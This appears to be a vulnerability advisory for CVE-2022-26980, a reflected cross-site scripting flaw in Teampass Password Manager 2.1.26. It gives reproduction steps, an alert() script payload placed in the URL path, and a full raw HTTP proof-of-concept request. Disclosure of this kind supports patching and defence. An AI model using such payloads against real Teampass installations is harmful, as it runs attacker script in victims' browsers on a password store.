CVE-2022-26980: CVE-2022-26980 - Reflected Cross Site Scripting (XSS) Vulnerability

Vulnerability Type: Reflected Cross Site Scripting (XSS) Vulnerability

Vendor of Product: Teampass

Affected Product Code Base: Teampass Password Manager

Product Version: 2.1.26

Description: Teampass 2.1.26 allows reflected XSS via the index.php PATH_INFO

Attack Vectors: Someone must open a link for the Teampass Password Manager index page containing malicious payload

Attack Type: Remote

Payload: ><script>alert(‘rnpg’)</script>"

Assigned CVE-ID: CVE-2022-26980

Discoverer: Raspina Net Pars Group (RNPG), Faegheh Saberi

Steps To Reproduce

1. Browse the Index Page of the Teampass Password Manager 2.1.26

2.You can create your malicious payload like the following and run your arbitrary JavaScript code on the browser’s of the victim

Example: http://<address in which Teampass Password Manager is set up>/?"><script>alert(‘rnpg’)</script>"

#PoC

GET /?"><script>alert(‘rnpg’)</script>" HTTP/1.1

Host: <address in which Teampass Password Manager is set up>

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close